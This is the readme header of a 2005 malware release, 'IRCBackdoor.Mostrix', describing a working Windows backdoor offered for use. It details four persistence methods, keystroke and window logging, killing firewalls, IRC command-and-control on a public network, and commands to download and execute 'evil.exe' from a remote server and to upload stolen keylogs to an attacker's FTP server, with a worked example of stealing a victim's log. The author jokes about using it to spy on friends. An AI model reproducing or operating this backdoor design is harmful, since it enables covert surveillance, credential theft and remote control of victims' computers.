같같같같같같같같같같같같
	같 IRCBackdoor.Mostrix 같
	같 _________source___ 같
	같                     같
	같 by DiA / RRLF (c)05 같
	같                     같
	같같같같같같같같같같같같

	disclaimer:
		This is a source code of a working backdoor. If you
		use this piece of code you and only YOU are responsible
		for your doing. Please take care.

	intro:
		After doing Backdoor.Gnaaarly i wanted to do some malware
		you can control over the internet. And here we go, some
		slim but evil backdoor ;). It is not a "fun" door like
		Gnaaarly, with this bug you can get some info what friends
		of you do :D. Have fun...

	features:
		- install itself into system with 4 methods:
			> first try to copy to windows folder and do autostart registry entry
			> if Mostrix can't write to registry it edit win.ini in windows folder
			> if Mostrix can't write to windows directory it try's to copy itself
			  to startup folder
			> if it can't copy to startup folder, it edit's autoexec.bat in C:\
		- log every key event and foreground windows and save all log's
		  under current date .sys in windows directory under subdir "mslog"
		- kill some favorite firewalls and internet security suites
		- connect to irc.freenode.net and accept private commands in chan "mostrix"
		- reconnect every half hour

	commands:
		- every command is only accepted at privat chat!

		systeminfo 'temporary file path'
		ae: systeminfo 'C:\info.txt'

			> this command get some info about infected system and save it
			  in a temporary file...

		dirlist 'directory to list' 'temporary file path'
		ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'

			> this command list all sub directorys in a temporary file...

		filelist 'directory to list' 'temporary file path'
		ae: filelist 'C:\' 'C:\C_drive_files.txt'

			> this command list all files in one directory and save it
			  in a temporary file...

		delete 'file to delete'
		ae: delete 'C:\C_drive_files.txt'

			> this command delete's a file, just use it to remove your
			  temporary files...

		execute 'application to execute'
		ae: execute 'C:\Windows\Notepad.exe'

			> this command executes a application, maybe one you downloaded
			  to the infected computer...

		download 'http:// url file to download' 'save path'
		ae: download 'http://server.com/user/evil.exe' 'C:\nice.exe'

			> download's a file via http protocol to local infected computer...

		upload 'file to upload' 'ftp server' 'user' 'password'
		ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'

			> this command upload's a local file of infected computer
			  to your ftp server, name at ftp server is the same on disk...

	steal a log:
		Let's say you want a keylog from the 7. June 2005, just do so
		(imaging "Windows" is the windows directory):

			upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

		How easy ;D.

	outro:
		This is the first malware from me that can be used to make evil things.
		But please, just learn from it and don't bring yourself in trouble.
		Hav phun partyppl, see you next time...

						DiA - DiA_hates_machinegmx.de - 06.06.2k5